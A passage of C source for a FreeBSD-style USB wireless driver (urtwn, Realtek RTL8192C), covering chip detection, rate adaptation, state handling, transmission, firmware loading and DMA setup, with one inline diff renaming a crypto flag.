ROM content. */ printf("\n"); for (i = 0; i < sizeof(sc->rom); i++) printf("%02x:", rom[i]); printf("\n"); } #endif } static int urtwn_read_chipid(struct urtwn_softc *sc) { uint32_t reg; reg = urtwn_read_4(sc, R92C_SYS_CFG); if (reg & R92C_SYS_CFG_TRP_VAUX_EN) return (EIO); if (reg & R92C_SYS_CFG_TYPE_92C) { sc->chip |= URTWN_CHIP_92C; /* Check if it is a castrated 8192C. */ if (MS(urtwn_read_4(sc, R92C_HPON_FSM), R92C_HPON_FSM_CHIP_BONDING_ID) == R92C_HPON_FSM_CHIP_BONDING_ID_92C_1T2R) sc->chip |= URTWN_CHIP_92C_1T2R; } if (reg & R92C_SYS_CFG_VENDOR_UMC) { sc->chip |= URTWN_CHIP_UMC; if (MS(reg, R92C_SYS_CFG_CHIP_VER_RTL) == 0) sc->chip |= URTWN_CHIP_UMC_A_CUT; } return (0); } static void urtwn_read_rom(struct urtwn_softc *sc) { struct r92c_rom *rom = &sc->rom; /* Read full ROM image. */ urtwn_efuse_read(sc); /* XXX Weird but this is what the vendor driver does. */ sc->pa_setting = urtwn_efuse_read_1(sc, 0x1fa); DPRINTF("PA setting=0x%x\n", sc->pa_setting); sc->board_type = MS(rom->rf_opt1, R92C_ROM_RF1_BOARD_TYPE); sc->regulatory = MS(rom->rf_opt1, R92C_ROM_RF1_REGULATORY); DPRINTF("regulatory type=%d\n", sc->regulatory); IEEE80211_ADDR_COPY(sc->sc_bssid, rom->macaddr); } /* * Initialize rate adaptation in firmware. */ static int urtwn_ra_init(struct urtwn_softc *sc) { static const uint8_t map[] = { 2, 4, 11, 22, 12, 18, 24, 36, 48, 72, 96, 108 }; struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni; struct ieee80211_rateset *rs; struct r92c_fw_cmd_macid_cfg cmd; uint32_t rates, basicrates; uint8_t mode; int maxrate, maxbasicrate, error, i, j; ni = ieee80211_ref_node(vap->iv_bss); rs = &ni->ni_rates; /* Get normal and basic rates mask. */ rates = basicrates = 0; maxrate = maxbasicrate = 0; for (i = 0; i < rs->rs_nrates; i++) { /* Convert 802.11 rate to HW rate index. */ for (j = 0; j < nitems(map); j++) if ((rs->rs_rates[i] & IEEE80211_RATE_VAL) == map[j]) break; if (j == nitems(map)) /* Unknown rate, skip. */ continue; rates |= 1 << j; if (j > maxrate) maxrate = j; if (rs->rs_rates[i] & IEEE80211_RATE_BASIC) { basicrates |= 1 << j; if (j > maxbasicrate) maxbasicrate = j; } } if (ic->ic_curmode == IEEE80211_MODE_11B) mode = R92C_RAID_11B; else mode = R92C_RAID_11BG; DPRINTF("mode=0x%x rates=0x%08x, basicrates=0x%08x\n", mode, rates, basicrates); /* Set rates mask for group addressed frames. */ cmd.macid = URTWN_MACID_BC | URTWN_MACID_VALID; cmd.mask = htole32(mode << 28 | basicrates); error = urtwn_fw_cmd(sc, R92C_CMD_MACID_CONFIG, &cmd, sizeof(cmd)); if (error != 0) { ieee80211_free_node(ni); device_printf(sc->sc_dev, "could not add broadcast station\n"); return (error); } /* Set initial MRR rate. */ DPRINTF("maxbasicrate=%d\n", maxbasicrate); urtwn_write_1(sc, R92C_INIDATA_RATE_SEL(URTWN_MACID_BC), maxbasicrate); /* Set rates mask for unicast frames. */ cmd.macid = URTWN_MACID_BSS | URTWN_MACID_VALID; cmd.mask = htole32(mode << 28 | rates); error = urtwn_fw_cmd(sc, R92C_CMD_MACID_CONFIG, &cmd, sizeof(cmd)); if (error != 0) { ieee80211_free_node(ni); device_printf(sc->sc_dev, "could not add BSS station\n"); return (error); } /* Set initial MRR rate. */ DPRINTF("maxrate=%d\n", maxrate); urtwn_write_1(sc, R92C_INIDATA_RATE_SEL(URTWN_MACID_BSS), maxrate); /* Indicate highest supported rate. */ ni->ni_txrate = rs->rs_rates[rs->rs_nrates - 1]; ieee80211_free_node(ni); return (0); } void urtwn_tsf_sync_enable(struct urtwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct ieee80211_node *ni = vap->iv_bss; uint64_t tsf; /* Enable TSF synchronization. */ urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) & ~R92C_BCN_CTRL_DIS_TSF_UDT0); urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) & ~R92C_BCN_CTRL_EN_BCN); /* Set initial TSF. */ memcpy(&tsf, ni->ni_tstamp.data, 8); tsf = le64toh(tsf); tsf = tsf - (tsf % (vap->iv_bss->ni_intval * IEEE80211_DUR_TU)); tsf -= IEEE80211_DUR_TU; urtwn_write_4(sc, R92C_TSFTR + 0, tsf); urtwn_write_4(sc, R92C_TSFTR + 4, tsf >> 32); urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) | R92C_BCN_CTRL_EN_BCN); } static void urtwn_set_led(struct urtwn_softc *sc, int led, int on) { uint8_t reg; if (led == URTWN_LED_LINK) { reg = urtwn_read_1(sc, R92C_LEDCFG0) & 0x70; if (!on) reg |= R92C_LEDCFG0_DIS; urtwn_write_1(sc, R92C_LEDCFG0, reg); sc->ledlink = on; /* Save LED state. */ } } static int urtwn_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct urtwn_vap *uvp = URTWN_VAP(vap); struct ieee80211com *ic = vap->iv_ic; struct urtwn_softc *sc = ic->ic_ifp->if_softc; struct ieee80211_node *ni; enum ieee80211_state ostate; uint32_t reg; ostate = vap->iv_state; DPRINTF("%s -> %s\n", ieee80211_state_name[ostate], ieee80211_state_name[nstate]); IEEE80211_UNLOCK(ic); URTWN_LOCK(sc); callout_stop(&sc->sc_watchdog_ch); if (ostate == IEEE80211_S_RUN) { /* Turn link LED off. */ urtwn_set_led(sc, URTWN_LED_LINK, 0); /* Set media status to 'No Link'. */ reg = urtwn_read_4(sc, R92C_CR); reg = RW(reg, R92C_CR_NETTYPE, R92C_CR_NETTYPE_NOLINK); urtwn_write_4(sc, R92C_CR, reg); /* Stop Rx of data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0); /* Rest TSF. */ urtwn_write_1(sc, R92C_DUAL_TSF_RST, 0x03); /* Disable TSF synchronization. */ urtwn_write_1(sc, R92C_BCN_CTRL, urtwn_read_1(sc, R92C_BCN_CTRL) | R92C_BCN_CTRL_DIS_TSF_UDT0); /* Reset EDCA parameters. */ urtwn_write_4(sc, R92C_EDCA_VO_PARAM, 0x002f3217); urtwn_write_4(sc, R92C_EDCA_VI_PARAM, 0x005e4317); urtwn_write_4(sc, R92C_EDCA_BE_PARAM, 0x00105320); urtwn_write_4(sc, R92C_EDCA_BK_PARAM, 0x0000a444); } switch (nstate) { case IEEE80211_S_INIT: /* Turn link LED off. */ urtwn_set_led(sc, URTWN_LED_LINK, 0); break; case IEEE80211_S_SCAN: if (ostate != IEEE80211_S_SCAN) { /* Allow Rx from any BSSID. */ urtwn_write_4(sc, R92C_RCR, urtwn_read_4(sc, R92C_RCR) & ~(R92C_RCR_CBSSID_DATA | R92C_RCR_CBSSID_BCN)); /* Set gain for scanning. */ reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(0)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x20); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(0), reg); reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(1)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x20); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(1), reg); } /* Make link LED blink during scan. */ urtwn_set_led(sc, URTWN_LED_LINK, !sc->ledlink); /* Pause AC Tx queues. */ urtwn_write_1(sc, R92C_TXPAUSE, urtwn_read_1(sc, R92C_TXPAUSE) | 0x0f); urtwn_set_chan(sc, ic->ic_curchan, NULL); break; case IEEE80211_S_AUTH: /* Set initial gain under link. */ reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(0)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x32); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(0), reg); reg = urtwn_bb_read(sc, R92C_OFDM0_AGCCORE1(1)); reg = RW(reg, R92C_OFDM0_AGCCORE1_GAIN, 0x32); urtwn_bb_write(sc, R92C_OFDM0_AGCCORE1(1), reg); urtwn_set_chan(sc, ic->ic_curchan, NULL); break; case IEEE80211_S_RUN: if (vap->iv_opmode == IEEE80211_M_MONITOR) { /* Enable Rx of data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0xffff); /* Turn link LED on. */ urtwn_set_led(sc, URTWN_LED_LINK, 1); break; } ni = ieee80211_ref_node(vap->iv_bss); /* Set media status to 'Associated'. */ reg = urtwn_read_4(sc, R92C_CR); reg = RW(reg, R92C_CR_NETTYPE, R92C_CR_NETTYPE_INFRA); urtwn_write_4(sc, R92C_CR, reg); /* Set BSSID. */ urtwn_write_4(sc, R92C_BSSID + 0, LE_READ_4(&ni->ni_bssid[0])); urtwn_write_4(sc, R92C_BSSID + 4, LE_READ_2(&ni->ni_bssid[4])); if (ic->ic_curmode == IEEE80211_MODE_11B) urtwn_write_1(sc, R92C_INIRTS_RATE_SEL, 0); else /* 802.11b/g */ urtwn_write_1(sc, R92C_INIRTS_RATE_SEL, 3); /* Enable Rx of data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0xffff); /* Flush all AC queues. */ urtwn_write_1(sc, R92C_TXPAUSE, 0); /* Set beacon interval. */ urtwn_write_2(sc, R92C_BCN_INTERVAL, ni->ni_intval); /* Allow Rx from our BSSID only. */ urtwn_write_4(sc, R92C_RCR, urtwn_read_4(sc, R92C_RCR) | R92C_RCR_CBSSID_DATA | R92C_RCR_CBSSID_BCN); /* Enable TSF synchronization. */ urtwn_tsf_sync_enable(sc); urtwn_write_1(sc, R92C_SIFS_CCK + 1, 10); urtwn_write_1(sc, R92C_SIFS_OFDM + 1, 10); urtwn_write_1(sc, R92C_SPEC_SIFS + 1, 10); urtwn_write_1(sc, R92C_MAC_SPEC_SIFS + 1, 10); urtwn_write_1(sc, R92C_R2T_SIFS + 1, 10); urtwn_write_1(sc, R92C_T2T_SIFS + 1, 10); /* Intialize rate adaptation. */ urtwn_ra_init(sc); /* Turn link LED on. */ urtwn_set_led(sc, URTWN_LED_LINK, 1); sc->avg_pwdb = -1; /* Reset average RSSI. */ /* Reset temperature calibration state machine. */ sc->thcal_state = 0; sc->thcal_lctemp = 0; ieee80211_free_node(ni); break; default: break; } URTWN_UNLOCK(sc); IEEE80211_LOCK(ic); return(uvp->newstate(vap, nstate, arg)); } static void urtwn_watchdog(void *arg) { struct urtwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_txtimer > 0) { if (--sc->sc_txtimer == 0) { device_printf(sc->sc_dev, "device timeout\n"); ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, urtwn_watchdog, sc); } } static void urtwn_update_avgrssi(struct urtwn_softc *sc, int rate, int8_t rssi) { int pwdb; /* Convert antenna signal to percentage. */ if (rssi <= -100 || rssi >= 20) pwdb = 0; else if (rssi >= 0) pwdb = 100; else pwdb = 100 + rssi; if (rate <= 3) { /* CCK gain is smaller than OFDM/MCS gain. */ pwdb += 6; if (pwdb > 100) pwdb = 100; if (pwdb <= 14) pwdb -= 4; else if (pwdb <= 26) pwdb -= 8; else if (pwdb <= 34) pwdb -= 6; else if (pwdb <= 42) pwdb -= 2; } if (sc->avg_pwdb == -1) /* Init. */ sc->avg_pwdb = pwdb; else if (sc->avg_pwdb < pwdb) sc->avg_pwdb = ((sc->avg_pwdb * 19 + pwdb) / 20) + 1; else sc->avg_pwdb = ((sc->avg_pwdb * 19 + pwdb) / 20); DPRINTFN(4, "PWDB=%d EMA=%d\n", pwdb, sc->avg_pwdb); } static int8_t urtwn_get_rssi(struct urtwn_softc *sc, int rate, void *physt) { static const int8_t cckoff[] = { 16, -12, -26, -46 }; struct r92c_rx_phystat *phy; struct r92c_rx_cck *cck; uint8_t rpt; int8_t rssi; if (rate <= 3) { cck = (struct r92c_rx_cck *)physt; if (sc->sc_flags & URTWN_FLAG_CCK_HIPWR) { rpt = (cck->agc_rpt >> 5) & 0x3; rssi = (cck->agc_rpt & 0x1f) << 1; } else { rpt = (cck->agc_rpt >> 6) & 0x3; rssi = cck->agc_rpt & 0x3e; } rssi = cckoff[rpt] - rssi; } else { /* OFDM/HT. */ phy = (struct r92c_rx_phystat *)physt; rssi = ((le32toh(phy->phydw1) >> 1) & 0x7f) - 110; } return (rssi); } static int urtwn_tx_start(struct urtwn_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, struct urtwn_data *data) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211_frame *wh; struct ieee80211_key *k; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct usb_xfer *xfer; struct r92c_tx_desc *txd; uint8_t raid, type; uint16_t sum; int i, hasqos, xferlen; struct usb_xfer *urtwn_pipes[4] = { sc->sc_xfer[URTWN_BULK_TX_BE], sc->sc_xfer[URTWN_BULK_TX_BK], sc->sc_xfer[URTWN_BULK_TX_VI], sc->sc_xfer[URTWN_BULK_TX_VO] }; URTWN_ASSERT_LOCKED(sc); /* * Software crypto. */ wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); /* XXX we don't expect the fragmented frames */ m_freem(m0); return (ENOBUFS); } /* in case packet header moved, reset pointer */ wh = mtod(m0, struct ieee80211_frame *); } switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: xfer = sc->sc_xfer[URTWN_BULK_TX_VO]; break; default: KASSERT(M_WME_GETAC(m0) < 4, ("unsupported WME pipe %d", M_WME_GETAC(m0))); xfer = urtwn_pipes[M_WME_GETAC(m0)]; break; } hasqos = 0; /* Fill Tx descriptor. */ txd = (struct r92c_tx_desc *)data->buf; memset(txd, 0, sizeof(*txd)); txd->txdw0 |= htole32( SM(R92C_TXDW0_PKTLEN, m0->m_pkthdr.len) | SM(R92C_TXDW0_OFFSET, sizeof(*txd)) | R92C_TXDW0_OWN | R92C_TXDW0_FSG | R92C_TXDW0_LSG); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txd->txdw0 |= htole32(R92C_TXDW0_BMCAST); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; if (!IEEE80211_IS_MULTICAST(wh->i_addr1) && type == IEEE80211_FC0_TYPE_DATA) { if (ic->ic_curmode == IEEE80211_MODE_11B) raid = R92C_RAID_11B; else raid = R92C_RAID_11BG; txd->txdw1 |= htole32( SM(R92C_TXDW1_MACID, URTWN_MACID_BSS) | SM(R92C_TXDW1_QSEL, R92C_TXDW1_QSEL_BE) | SM(R92C_TXDW1_RAID, raid) | R92C_TXDW1_AGGBK); if (ic->ic_flags & IEEE80211_F_USEPROT) { if (ic->ic_protmode == IEEE80211_PROT_CTSONLY) { txd->txdw4 |= htole32(R92C_TXDW4_CTS2SELF | R92C_TXDW4_HWRTSEN); } else if (ic->ic_protmode == IEEE80211_PROT_RTSCTS) { txd->txdw4 |= htole32(R92C_TXDW4_RTSEN | R92C_TXDW4_HWRTSEN); } } /* Send RTS at OFDM24. */ txd->txdw4 |= htole32(SM(R92C_TXDW4_RTSRATE, 8)); txd->txdw5 |= htole32(0x0001ff00); /* Send data at OFDM54. */ txd->txdw5 |= htole32(SM(R92C_TXDW5_DATARATE, 11)); } else { txd->txdw1 |= htole32( SM(R92C_TXDW1_MACID, 0) | SM(R92C_TXDW1_QSEL, R92C_TXDW1_QSEL_MGNT) | SM(R92C_TXDW1_RAID, R92C_RAID_11B)); /* Force CCK1. */ txd->txdw4 |= htole32(R92C_TXDW4_DRVRATE); txd->txdw5 |= htole32(SM(R92C_TXDW5_DATARATE, 0)); } /* Set sequence number (already little endian). */ txd->txdseq |= *(uint16_t *)wh->i_seq; if (!hasqos) { /* Use HW sequence numbering for non-QoS frames. */ txd->txdw4 |= htole32(R92C_TXDW4_HWSEQ); txd->txdseq |= htole16(0x8000); } else txd->txdw4 |= htole32(R92C_TXDW4_QOS); /* Compute Tx descriptor checksum. */ sum = 0; for (i = 0; i < sizeof(*txd) / 2; i++) sum ^= ((uint16_t *)txd)[i]; txd->txdsum = sum; /* NB: already little endian. */ if (ieee80211_radiotap_active_vap(vap)) { struct urtwn_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); ieee80211_radiotap_tx(vap, m0); } xferlen = sizeof(*txd) + m0->m_pkthdr.len; m_copydata(m0, 0, m0->m_pkthdr.len, (caddr_t)&txd[1]); data->buflen = xferlen; data->ni = ni; data->m = m0; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(xfer); return (0); } static void urtwn_start(struct ifnet *ifp) { struct urtwn_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; struct urtwn_data *bf; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; URTWN_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; bf = urtwn_getbuf(sc); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (urtwn_tx_start(sc, ni, m, bf) != 0) { ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); ieee80211_free_node(ni); break; } sc->sc_txtimer = 5; callout_reset(&sc->sc_watchdog_ch, hz, urtwn_watchdog, sc); } URTWN_UNLOCK(sc); } static int urtwn_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { urtwn_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtwn_stop(ifp, 1); } if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static int urtwn_alloc_list(struct urtwn_softc *sc, struct urtwn_data data[], int ndata, int maxsz) { int i, error; for (i = 0; i < ndata; i++) { struct urtwn_data *dp = &data[i]; dp->sc = sc; dp->m = NULL; dp->buf = malloc(maxsz, M_USBDEV, M_NOWAIT); if (dp->buf == NULL) { device_printf(sc->sc_dev, "could not allocate buffer\n"); error = ENOMEM; goto fail; } dp->ni = NULL; } return (0); fail: urtwn_free_list(sc, data, ndata); return (error); } static int urtwn_alloc_rx_list(struct urtwn_softc *sc) { int error, i; error = urtwn_alloc_list(sc, sc->sc_rx, URTWN_RX_LIST_COUNT, URTWN_RXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < URTWN_RX_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); return (0); } static int urtwn_alloc_tx_list(struct urtwn_softc *sc) { int error, i; error = urtwn_alloc_list(sc, sc->sc_tx, URTWN_TX_LIST_COUNT, URTWN_TXBUFSZ); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < URTWN_TX_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); return (0); } static int urtwn_power_on(struct urtwn_softc *sc) { uint32_t reg; int ntries; /* Wait for autoload done bit. */ for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_1(sc, R92C_APS_FSMCO) & R92C_APS_FSMCO_PFM_ALDN) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for chip autoload\n"); return (ETIMEDOUT); } /* Unlock ISO/CLK/Power control register. */ urtwn_write_1(sc, R92C_RSV_CTRL, 0); /* Move SPS into PWM mode. */ urtwn_write_1(sc, R92C_SPS0_CTRL, 0x2b); DELAY(100); reg = urtwn_read_1(sc, R92C_LDOV12D_CTRL); if (!(reg & R92C_LDOV12D_CTRL_LDV12_EN)) { urtwn_write_1(sc, R92C_LDOV12D_CTRL, reg | R92C_LDOV12D_CTRL_LDV12_EN); DELAY(100); urtwn_write_1(sc, R92C_SYS_ISO_CTRL, urtwn_read_1(sc, R92C_SYS_ISO_CTRL) & ~R92C_SYS_ISO_CTRL_MD2PP); } /* Auto enable WLAN. */ urtwn_write_2(sc, R92C_APS_FSMCO, urtwn_read_2(sc, R92C_APS_FSMCO) | R92C_APS_FSMCO_APFM_ONMAC); for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_2(sc, R92C_APS_FSMCO) & R92C_APS_FSMCO_APFM_ONMAC) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for MAC auto ON\n"); return (ETIMEDOUT); } /* Enable radio, GPIO and LED functions. */ urtwn_write_2(sc, R92C_APS_FSMCO, R92C_APS_FSMCO_AFSM_HSUS | R92C_APS_FSMCO_PDN_EN | R92C_APS_FSMCO_PFM_ALDN); /* Release RF digital isolation. */ urtwn_write_2(sc, R92C_SYS_ISO_CTRL, urtwn_read_2(sc, R92C_SYS_ISO_CTRL) & ~R92C_SYS_ISO_CTRL_DIOR); /* Initialize MAC. */ urtwn_write_1(sc, R92C_APSD_CTRL, urtwn_read_1(sc, R92C_APSD_CTRL) & ~R92C_APSD_CTRL_OFF); for (ntries = 0; ntries < 200; ntries++) { if (!(urtwn_read_1(sc, R92C_APSD_CTRL) & R92C_APSD_CTRL_OFF_STATUS)) break; DELAY(5); } if (ntries == 200) { device_printf(sc->sc_dev, "timeout waiting for MAC initialization\n"); return (ETIMEDOUT); } /* Enable MAC DMA/WMAC/SCHEDULE/SEC blocks. */ reg = urtwn_read_2(sc, R92C_CR); reg |= R92C_CR_HCI_TXDMA_EN | R92C_CR_HCI_RXDMA_EN | R92C_CR_TXDMA_EN | R92C_CR_RXDMA_EN | R92C_CR_PROTOCOL_EN | R92C_CR_SCHEDULE_EN | R92C_CR_MACTXEN | R92C_CR_MACRXEN | R92C_CR_ENSEC; urtwn_write_2(sc, R92C_CR, reg); urtwn_write_1(sc, 0xfe10, 0x19); return (0); } static int urtwn_llt_init(struct urtwn_softc *sc) { int i, error; /* Reserve pages [0; R92C_TX_PAGE_COUNT]. */ for (i = 0; i < R92C_TX_PAGE_COUNT; i++) { if ((error = urtwn_llt_write(sc, i, i + 1)) != 0) return (error); } /* NB: 0xff indicates end-of-list. */ if ((error = urtwn_llt_write(sc, i, 0xff)) != 0) return (error); /* * Use pages [R92C_TX_PAGE_COUNT + 1; R92C_TXPKTBUF_COUNT - 1] * as ring buffer. */ for (++i; i < R92C_TXPKTBUF_COUNT - 1; i++) { if ((error = urtwn_llt_write(sc, i, i + 1)) != 0) return (error); } /* Make the last page point to the beginning of the ring buffer. */ error = urtwn_llt_write(sc, i, R92C_TX_PAGE_COUNT + 1); return (error); } static void urtwn_fw_reset(struct urtwn_softc *sc) { uint16_t reg; int ntries; /* Tell 8051 to reset itself. */ urtwn_write_1(sc, R92C_HMETFR + 3, 0x20); /* Wait until 8051 resets by itself. */ for (ntries = 0; ntries < 100; ntries++) { reg = urtwn_read_2(sc, R92C_SYS_FUNC_EN); if (!(reg & R92C_SYS_FUNC_EN_CPUEN)) return; DELAY(50); } /* Force 8051 reset. */ urtwn_write_2(sc, R92C_SYS_FUNC_EN, reg & ~R92C_SYS_FUNC_EN_CPUEN); } static int urtwn_fw_loadpage(struct urtwn_softc *sc, int page, const uint8_t *buf, int len) { uint32_t reg; int off, mlen, error = 0; reg = urtwn_read_4(sc, R92C_MCUFWDL); reg = RW(reg, R92C_MCUFWDL_PAGE, page); urtwn_write_4(sc, R92C_MCUFWDL, reg); off = R92C_FW_START_ADDR; while (len > 0) { if (len > 196) mlen = 196; else if (len > 4) mlen = 4; else mlen = 1; /* XXX fix this deconst */ error = urtwn_write_region_1(sc, off, __DECONST(uint8_t *, buf), mlen); if (error != 0) break; off += mlen; buf += mlen; len -= mlen; } return (error); } static int urtwn_load_firmware(struct urtwn_softc *sc) { const struct firmware *fw; const struct r92c_fw_hdr *hdr; const char *imagename; const u_char *ptr; size_t len; uint32_t reg; int mlen, ntries, page, error; /* Read firmware image from the filesystem. */ if ((sc->chip & (URTWN_CHIP_UMC_A_CUT | URTWN_CHIP_92C)) == URTWN_CHIP_UMC_A_CUT) imagename = "urtwn-rtl8192cfwU"; else imagename = "urtwn-rtl8192cfwT"; fw = firmware_get(imagename); if (fw == NULL) { device_printf(sc->sc_dev, "failed loadfirmware of file %s\n", imagename); return (ENOENT); } len = fw->datasize; if (len < sizeof(*hdr)) { device_printf(sc->sc_dev, "firmware too short\n"); error = EINVAL; goto fail; } ptr = fw->data; hdr = (const struct r92c_fw_hdr *)ptr; /* Check if there is a valid FW header and skip it. */ if ((le16toh(hdr->signature) >> 4) == 0x88c || (le16toh(hdr->signature) >> 4) == 0x92c) { DPRINTF("FW V%d.%d %02d-%02d %02d:%02d\n", le16toh(hdr->version), le16toh(hdr->subversion), hdr->month, hdr->date, hdr->hour, hdr->minute); ptr += sizeof(*hdr); len -= sizeof(*hdr); } if (urtwn_read_1(sc, R92C_MCUFWDL) & 0x80) { urtwn_fw_reset(sc); urtwn_write_1(sc, R92C_MCUFWDL, 0); } urtwn_write_2(sc, R92C_SYS_FUNC_EN, urtwn_read_2(sc, R92C_SYS_FUNC_EN) | R92C_SYS_FUNC_EN_CPUEN); urtwn_write_1(sc, R92C_MCUFWDL, urtwn_read_1(sc, R92C_MCUFWDL) | R92C_MCUFWDL_EN); urtwn_write_1(sc, R92C_MCUFWDL + 2, urtwn_read_1(sc, R92C_MCUFWDL + 2) & ~0x08); for (page = 0; len > 0; page++) { mlen = min(len, R92C_FW_PAGE_SIZE); error = urtwn_fw_loadpage(sc, page, ptr, mlen); if (error != 0) { device_printf(sc->sc_dev, "could not load firmware page\n"); goto fail; } ptr += mlen; len -= mlen; } urtwn_write_1(sc, R92C_MCUFWDL, urtwn_read_1(sc, R92C_MCUFWDL) & ~R92C_MCUFWDL_EN); urtwn_write_1(sc, R92C_MCUFWDL + 1, 0); /* Wait for checksum report. */ for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_4(sc, R92C_MCUFWDL) & R92C_MCUFWDL_CHKSUM_RPT) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for checksum report\n"); error = ETIMEDOUT; goto fail; } reg = urtwn_read_4(sc, R92C_MCUFWDL); reg = (reg & ~R92C_MCUFWDL_WINTINI_RDY) | R92C_MCUFWDL_RDY; urtwn_write_4(sc, R92C_MCUFWDL, reg); /* Wait for firmware readiness. */ for (ntries = 0; ntries < 1000; ntries++) { if (urtwn_read_4(sc, R92C_MCUFWDL) & R92C_MCUFWDL_WINTINI_RDY) break; DELAY(5); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for firmware readiness\n"); error = ETIMEDOUT; goto fail; } fail: firmware_put(fw, FIRMWARE_UNLOAD); return (error); } static int urtwn_dma_init(struct urtwn_softc *sc) { int hashq, hasnq, haslq, nqueues, nqpages, nrempages; uint32_t reg; int error; /* Initialize LLT table. */ error = urtwn_llt_init(sc); if (error != 0) return (error); /* Get Tx queues to USB endpoints mapping. */ hashq = hasnq = haslq = 0; reg = urtwn_read_2(sc, R92C_USB_EP + 1); DPRINTFN(2, "USB endpoints mapping 0x%x\n", reg); if (MS(reg, R92C_USB_EP_HQ) != 0) hashq = 1; if (MS(reg, R92C_USB_EP_NQ) != 0) hasnq = 1; if (MS(reg, R92C_USB_EP_LQ) != 0) haslq = 1; nqueues = hashq + hasnq + haslq; if (nqueues == 0) return (EIO); /* Get the number of pages for each queue. */ nqpages = (R92C_TX_PAGE_COUNT - R92C_PUBQ_NPAGES) / nqueues; /* The remaining pages are assigned to the high priority queue. */ nrempages = (R92C_TX_PAGE_COUNT - R92C_PUBQ_NPAGES) % nqueues; /* Set number of pages for normal priority queue. */ urtwn_write_1(sc, R92C_RQPN_NPQ, hasnq ? nqpages : 0); urtwn_write_4(sc, R92C_RQPN, /* Set number of pages for public queue. */ SM(R92C_RQPN_PUBQ, R92C_PUBQ_NPAGES) | /* Set number of pages for high priority queue. */ SM(R92C_RQPN_HPQ, hashq ? nqpages + nrempages : 0) | /* Set number of pages for low priority queue. */ SM(R92C_RQPN_LPQ, haslq ? nqpages : 0) | /* Load values. */ R92C_RQPN_LD); urtwn_write_1(sc, R92C_TXPKTBUF_BCNQ_BDNY, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TXPKTBUF_MGQ_BDNY, R92C_TX_PAGE_BOUNDARY); 